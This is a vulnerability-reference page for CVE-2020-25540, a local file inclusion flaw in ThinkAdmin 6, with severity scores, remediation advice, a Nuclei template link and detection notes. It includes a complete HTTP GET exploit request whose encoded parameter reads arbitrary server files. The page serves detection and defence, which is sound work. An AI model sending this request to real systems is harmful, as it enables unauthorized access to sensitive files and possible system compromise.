🔙 목록으로 돌아가기

CVE-2020-25540: ThinkAdmin 6 - Local File Inclusion

TitleThinkAdmin 6 - Local File Inclusion
Authorgeeknik
SeverityHigh
ImpactSuccessful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire system.
RemediationApply the latest patch or upgrade to a version that is not affected by the vulnerability.
CVSS Score7.5
EPSS Score0.94093
CVE IDCVE-2020-25540
CWE IDCWE-22
Tags cve cve2020 thinkadmin lfi edb packetstorm ctolog vkev vuln

🔍 Vulnerability Description

ThinkAdmin version 6 is affected by a local file inclusion vulnerability because an unauthorized attacker can read arbitrary files on a remote server via GET request encode parameter.

🌐 HTTP Request

GET /admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b2t382r1b342p37373b2s HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-25540.yaml

🦈 Packet Capture: ⬇️ Download cve-2020-25540.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A